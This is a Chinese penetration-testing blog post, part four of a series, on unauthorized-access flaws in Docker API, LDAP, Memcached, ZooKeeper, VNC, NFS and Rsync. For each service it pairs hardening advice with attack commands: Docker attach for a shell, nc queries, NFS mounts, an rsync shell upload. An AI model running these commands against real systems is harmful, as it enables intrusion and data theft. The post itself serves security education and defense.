浅谈常见未授权访问漏洞系列（四）

浅谈常见未授权访问漏洞系列（四）
2023-1-19 20:2:2 Author: 渗透安全团队(查看原文) 阅读量:22 收藏

今天我们继续来聊一聊常见未授权访问漏洞系列四，每一次的记录都能让自己有所收获，每一次的实战记录笔记会让自己对这个漏洞更加的熟悉。

系列一在这：浅谈常见未授权访问漏洞系列（一）。

系列二在这：浅谈常见未授权访问漏洞系列（二）。

系列三在这：浅谈常见未授权访问漏洞系列（三）。

一、浅谈常见未授权访问漏洞系列四

1、Docker 未授权访问

（1）攻

Docker是一款轻量级开源容器，可以自身大批量部署各种应用系统平台。在搭建环境时，在配置了2375端口远程访问未对其进行权限控制，导致攻击者可以通过该漏洞获取服务器权限。

#获取docker信息http://IP地址:2375/info#获取版本信息http://IP地址:2375/version#获取images/json列表信息http://IP地址:2375/images/   #返回OK即可证明可返回images/json列表信息http://IP地址:2375/images/json

后续利用

#列出所有容器信息docker -H tcp://IP地址 ps -a#列出镜像信息docker -H tcp://IP地址 images #通过attach命令获取shell权限docker -H tcp://IP地址 attach container id#通过写入SSH公钥获取shell权限#通过写定时任务反弹shell获取shell权限......等等脚本利用：https://github.com/ianxtianxt/docker_api_vul

（2）防

①对我们的2375端口进行权限访问控制（例如ACL控制技术）。

②配置我们的docker swarm的认证方式，例如可以使用TLS认证机制。

③将我们的默认端口2375修改为不常见访问端口。

④以较低权限账号运行docker，不要以root权限运行。

2、LDAP未授权访问

（1）攻

LDAP是一种轻型目录访问协议，在搭建时未对其进行密码验证机制，出现未授权访问，可以直接获取目录内容等敏感信息。

LDAP默认端口为389,LDAPS默认端口为636，目前市面上LDAPS已经被淘汰了。直接使用ldapbrowser进行连接下载地址：https://ldapbrowserwindows.com/

（2）防

①对我们的389端口进行权限访问控制（例如ACL控制技术）。

②进行账号密码权限验证机制。

3、Memcached 未授权访问

（1）攻

Memcached是一款高速缓存系统，一般情况下memcached缺少账号密码认证机制以及各种安全管制机制，所以我们一般会将其放置在安全设备之后，防止数据泄露，而目前将其放置在公网上则会导致未授权访问漏洞的存在。

telnet IP地址 端口nc -vv IP地址 端口#查看服务状态stats#查看items项stats items#获取缓存keystats cachedump slab_id limit_num#还有更多命令可以参考Memcached 使用命令

（2）防

①禁止将该服务系统放置公网上。

②开启黑白名单访问机制。

③将我们的默认端口11211修改为不常见访问端口。

④以较低权限账号运行Memcached服务。

4、ZooKeeper 未授权访问

（1）攻

ZooKeeper 是一款分布式应用程序协调服务，可以进行配置维护、同步、组服务、域名服务等功能；在搭建ZooKeeper环境时，默认配置是没有配置访问控制策略的，默认端口为2181，这时候我们可以通过访问2181端口执行命令获取相关敏感信息。

#列出客户端连接的统计信息echo stat |nc ip地址 端口（默认2181）#列出服务环境的详细信息echo envi |nc ip地址 端口（默认2181）#测试服务器是否运行在非错误状态echo ruok |nc ip地址 端口（默认2181）#列出未完成会话和临时节点echo dump |nc ip地址 端口（默认2181）#列出未完成的请求echo reqs |nc ip地址 端口（默认2181）

（2）防

①禁止将ZooKeeper该服务系统放置公网上。

②开启黑白名单访问机制。

③将我们的默认端口2181修改为不常见访问端口。

5、VNC 未授权访问

（1）攻

VNC是一款我们常用的远程控制工具软件，搭建好环境时默认访问端口为5900,5901,但是也有一部分喜欢在5800搭建环境，由于搭建好没有对其进行访问权限控制机制导致未授权访问漏洞，攻击者可以使用vnc view进行连接，直接获取服务器所有权。

#直接以端口号5900,5901进行连接vncviewer IP地址:端口#以密码连接vncviewer -passwd /vnc/vncpasswdfile IP地址:端口#使用vnc viewer工具连接下载链接：https://vnc-viewer.en.softonic.com/

（2）防

①以较低权限运行vnc服务。

②开启黑白名单访问机制。

③对我们的vnc远程开启强的账号密码权限验证机制。

6、NFS 未授权访问

（1）攻

NFS 是我们常用的一款文件共享系统，可以通过网络进行资源共享，但是在共享的同时没有对其进行权限控制，导致共享资源可被任意用户进行浏览，导致信息泄露。

默认端口2049#查看共享资源showmount -e IP地址#存在目录时我们可以使用命令将共享目录挂载到我们自身本地进行浏览mount -t nfs IP地址:/共享目录 /本地目录

（2）防

①可以在配置文件/etc/exports下对所需要共享的文件或文件夹进行权限访问控制。

②开启黑白名单访问机制，特别是nfs服务默认端口2049。

7、Rsync 未授权访问

（1）攻

rsync在我们日常生活中远程数据同步时提供了极大的便利，它是Linux/Unix下的一个远程数据同步工具，默认是873服务端口，搭建好之后没有细心的对其进行安全权限控制，导致攻击者可以访问rsync，进行任意文件下载，任意文件上传拿下服务器权限。

#直接使用rsync命令进行连接rsync rsync://IP地址:873/rsync rsync://IP地址:873/文件名或文件夹名#上传文件rsync -av shell rsync://IP地址:873/文件名或文件夹名/shell#下载恶意文件或执行脚本rsync -av  rsync://IP地址:873/文件名或文件夹名.......等等敏感操作

（2）防

①对其进行账号密码权限等访问控制。

②开启黑白名单访问机制，特别是默认端口873端口。

③若是核心数据需要对其进行数据加密传输。

④修改配置文件中的list=false可以让我们的module信息隐藏起来。

二、总结

每一次在实战授权测试中去打未授权访问漏洞都能让自己获取到不少的信息资产，可以在这些信息资产中去挖掘下一个漏洞，这一次运气好直接获得了一些未开源系统代码，然后对其进行代码审计获得了部分漏洞，有时候机遇就在我们身边，未授权有时候看起来很鸡肋，但是作用却是非常大的，可以说找到一个未授权直接成功了一半了。

★

付费圈子

欢迎加入星球！

代码审计+免杀+渗透学习资源+各种资料文档+各种工具+付费会员

进成员内部群

星球的最近主题和星球内部工具一些展示

关注有礼

关注下方公众号回复“666”可以领取一套精品渗透测试工具集和百度云视频链接。

还在等什么？赶紧点击下方名片关注学习吧！

推荐阅读

群聊 | 技术交流群-群除我佬

干货｜史上最全一句话木马

干货 | CS绕过vultr特征检测修改算法

实战 | 用中国人写的红队服务器搞一次内网穿透练习

实战 | 渗透某培训平台经历

实战 | 一次曲折的钓鱼溯源反制

免责声明

由于传播、利用本公众号渗透安全团队所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，公众号渗透安全团队及作者不为此承担任何责任，一旦造成后果请自行承担！如有侵权烦请告知，我们会立即删除并致歉。谢谢！

文章来源: http://mp.weixin.qq.com/s?__biz=MzkxNDAyNTY2NA==&mid=2247496376&idx=2&sn=dd2ba2f44e1b114491b7f69964e94d95&chksm=c1760f17f6018601720abda0418313fded38de408bc180b7a15ef2bfabb92ae6d1df8b18bc64#rd
如有侵权请联系:admin#unsafe.sh